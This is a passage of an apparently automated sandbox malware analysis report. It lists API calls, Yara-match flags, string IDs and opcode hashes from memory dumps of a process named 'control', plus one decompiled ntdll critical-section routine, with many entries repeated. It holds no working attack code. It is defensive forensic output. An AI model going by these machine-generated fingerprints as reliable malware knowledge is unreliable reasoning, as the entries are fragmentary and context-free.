                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: f0519bab75daf4e1ff0f91e507ddac5773def89b543715a974b3634832043ab8
                                                                                                                                                                                                                                                                                                • Instruction ID: e39a60ca623bb4abd20a526d14ef158471281c48d64abb3ccee174302c19e1f2
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: f0519bab75daf4e1ff0f91e507ddac5773def89b543715a974b3634832043ab8
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 9F90027120100923D11161D985047071109A7D0281FD1C412A0814598DDA968952B261
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • LookupPrivilegeValueW.ADVAPI32(00000000,?,O,004FE0E2,?,00000000,?,?), ref: 0050CC00
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: LookupPrivilegeValue
                                                                                                                                                                                                                                                                                                • String ID: ~"PT$O
                                                                                                                                                                                                                                                                                                • API String ID: 3899507212-2197653313
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0050B56B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • Sleep.KERNELBASE(000007D0), ref: 0050B56B
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: Sleep
                                                                                                                                                                                                                                                                                                • String ID: net.dll$wininet.dll
                                                                                                                                                                                                                                                                                                • API String ID: 3472027048-1269752229
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(?), ref: 004FFDC3
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                • String ID: @
                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-2766056989
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,lZB,00000000,00000000,004FDDA2,?,?,?,425AE56C,?), ref: 0050B632
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID: lZB
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-878811233
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • CreateThread.KERNELBASE(00000000,00000000,-00000002,lZB,00000000,00000000,004FDDA2,?,?,?,425AE56C,?), ref: 0050B632
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: CreateThread
                                                                                                                                                                                                                                                                                                • String ID: lZB
                                                                                                                                                                                                                                                                                                • API String ID: 2422867632-878811233
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • GetFileAttributesW.KERNELBASE(2BP,?,?,00504232,00000000,?), ref: 004FE7BA
                                                                                                                                                                                                                                                                                                Strings
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: AttributesFile
                                                                                                                                                                                                                                                                                                • String ID: 2BP
                                                                                                                                                                                                                                                                                                • API String ID: 3188754299-1904907423
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlAllocateHeap.NTDLL(3nP,?,005075DD,005075DD,?,00506E33,00000000,?,?,?,?,00000000,00000000,00000002), ref: 0050CA5D
Strings
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: AllocateHeap
• String ID: 3nP
• API String ID: 1279760036-1232704774
Uniqueness

Uniqueness Score: -1.00%

APIs
• LookupPrivilegeValueW.ADVAPI32(00000000,?,O,004FE0E2,?,00000000,?,?), ref: 0050CC00
Strings
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: LookupPrivilegeValue
• String ID: O
• API String ID: 3899507212-2623078450
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00505237
Strings
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID: @J7<
• API String ID: 2538663250-2016760708
Uniqueness

Uniqueness Score: -1.00%

APIs
• CoInitialize.OLE32(00000000,00000000,?,00000000), ref: 00505237
Strings
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: Initialize
• String ID: @J7<
• API String ID: 2538663250-2016760708
Uniqueness

Uniqueness Score: -1.00%

APIs
• LdrLoadDll.NTDLL(00000000,00000000,00000003,?), ref: 004FB1D2
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: Load
• String ID:
• API String ID: 2234796835-0
Uniqueness

Uniqueness Score: -1.00%

APIs
• RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0050CA9D
Memory Dump Source
• Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_4f0000_control.jbxd
Yara matches
Similarity
• API ID: FreeHeap
• String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction ID: 95df83603d7bdeb34515c67282dafb31d184c19788c55eb750f5c0282dea9cc3
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 23a076b226fe51778b5763cad65316f8bf1a978e6f8bf853b8ff448c05f6660e
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 24E01AB12002086BCB14DF89DC49EAB37ACAF88750F014454B90957281C670E910CAB1
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • SetErrorMode.KERNELBASE(00008003,?,?,004F8D9A,?), ref: 004FE5C1
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: ErrorMode
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2340568224-0
                                                                                                                                                                                                                                                                                                • Opcode ID: 722c115f3bd7084106ab79a5ca0d4136209ca2286be3acf59629a06e3d9eed0c
                                                                                                                                                                                                                                                                                                • Instruction ID: 2697dbc098a4ff9b1e9865fbc56f2f5c9bbe55d2c4b8bae695ba5e72c2cbb830
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: 722c115f3bd7084106ab79a5ca0d4136209ca2286be3acf59629a06e3d9eed0c
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: E5D05E71B8420D7BF650A6E6DC07F6A368C9B48794F054055FA0CE72C2E855F5108169
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                • RtlFreeHeap.NTDLL(00000060,00000000,?,?,00000000,00000060,00000000,00000000,?,?,F162D13C,00000000,?), ref: 0050CA9D
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.779545324.00000000004F0000.00000040.80000000.00040000.00000000.sdmp, Offset: 004F0000, based on PE: false
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_4f0000_control.jbxd
                                                                                                                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: FreeHeap
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 3298025750-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction ID: 317754a297a0273873fa7a4ba7cc3638b53a62c90b591da0e71f778bfc340adc
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e4832b0115aa284da7ecc9123bae4915b8569b1c6ca6ff1ef97e8e89f529ccc7
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: 32E0C2B42087896FC704DF68D8408AB7FA4EF8A300B148A4DF8DA47642C230D829CBB0
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                APIs
                                                                                                                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                                                                                                                • Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                • Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
                                                                                                                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                                                                                                                • Snapshot File: hcaresult_11_2_1030000_control.jbxd
                                                                                                                                                                                                                                                                                                Similarity
                                                                                                                                                                                                                                                                                                • API ID: InitializeThunk
                                                                                                                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                                                                                                                • API String ID: 2994545307-0
                                                                                                                                                                                                                                                                                                • Opcode ID: e7b59a91347aac1e959d12d62319506f0aa6c9d21a2978405c1d238e8a70ea93
                                                                                                                                                                                                                                                                                                • Instruction ID: e916c4108128a425b09e695ce5a11a669f60918a7e7d4ec91e60baf5fed0dd51
                                                                                                                                                                                                                                                                                                • Opcode Fuzzy Hash: e7b59a91347aac1e959d12d62319506f0aa6c9d21a2978405c1d238e8a70ea93
                                                                                                                                                                                                                                                                                                • Instruction Fuzzy Hash: A4B09B719014C5D5DB51D7E546087177A4077D4745F56C055D1420681B8778C091F6F5
                                                                                                                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                                                                                                                C-Code - Quality: 53%
                                                                                                                                                                                                                                                                                                			E010EFDDA(intOrPtr* __edx, intOrPtr _a4) {
                                                                                                                                                                                                                                                                                                				void* _t7;
                                                                                                                                                                                                                                                                                                				intOrPtr _t9;
                                                                                                                                                                                                                                                                                                				intOrPtr _t10;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t12;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t13;
                                                                                                                                                                                                                                                                                                				intOrPtr _t14;
                                                                                                                                                                                                                                                                                                				intOrPtr* _t15;
                                                                                                                                                                                                                                                                                                
                                                                                                                                                                                                                                                                                                				_t13 = __edx;
                                                                                                                                                                                                                                                                                                				_push(_a4);
                                                                                                                                                                                                                                                                                                				_t14 =  *[fs:0x18];
                                                                                                                                                                                                                                                                                                				_t15 = _t12;
                                                                                                                                                                                                                                                                                                				_t7 = E0109CE00( *__edx,  *((intOrPtr*)(__edx + 4)), 0xff676980, 0xffffffff);
                                                                                                                                                                                                                                                                                                				_push(_t13);
                                                                                                                                                                                                                                                                                                				E010E5720(0x65, 1, "RTL: Enter CriticalSection Timeout (%I64u secs) %d\n", _t7);
                                                                                                                                                                                                                                                                                                				_t9 =  *_t15;
                                                                                                                                                                                                                                                                                                				if(_t9 == 0xffffffff) {
                                                                                                                                                                                                                                                                                                					_t10 = 0;
                                                                                                                                                                                                                                                                                                				} else {
                                                                                                                                                                                                                                                                                                					_t10 =  *((intOrPtr*)(_t9 + 0x14));
                                                                                                                                                                                                                                                                                                				}
                                                                                                                                                                                                                                                                                                				_push(_t10);
                                                                                                                                                                                                                                                                                                				_push(_t15);
                                                                                                                                                                                                                                                                                                				_push( *((intOrPtr*)(_t15 + 0xc)));
                                                                                                                                                                                                                                                                                                				_push( *((intOrPtr*)(_t14 + 0x24)));
                                                                                                                                                                                                                                                                                                				return E010E5720(0x65, 0, "RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u\n",  *((intOrPtr*)(_t14 + 0x20)));
                                                                                                                                                                                                                                                                                                			}











APIs
• __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 010EFDFA
Strings
• RTL: Enter CriticalSection Timeout (%I64u secs) %d, xrefs: 010EFE01
• RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u, xrefs: 010EFE2B
Memory Dump Source
• Source File: 0000000B.00000002.781712983.0000000001030000.00000040.00001000.00020000.00000000.sdmp, Offset: 01030000, based on PE: true
• Associated: 0000000B.00000002.781712983.000000000114B000.00000040.00001000.00020000.00000000.sdmp
• Associated: 0000000B.00000002.781712983.000000000114F000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_11_2_1030000_control.jbxd
Similarity
• API ID: Unothrow_t@std@@@__ehfuncinfo$??2@
• String ID: RTL: Enter CriticalSection Timeout (%I64u secs) %d$RTL: Pid.Tid %p.%p, owner tid %p Critical Section %p - ContentionCount == %u
• API String ID: 885266447-3903918235
• Opcode ID: 28695da2e791578d6929f8c86363c5c13691b093ae02a62cc1f2702e5c9797ff
• Instruction ID: 5f6342129ae9bd37123a1a5dfd511321daad1073cd88da7315abe03ef40c334b
• Opcode Fuzzy Hash: 28695da2e791578d6929f8c86363c5c13691b093ae02a62cc1f2702e5c9797ff
• Instruction Fuzzy Hash: 3FF0FC76640102BFE6201A46DC05F637F9AEB44730F140314F694561E1D962F83096F4
Uniqueness

Uniqueness Score: -1.00%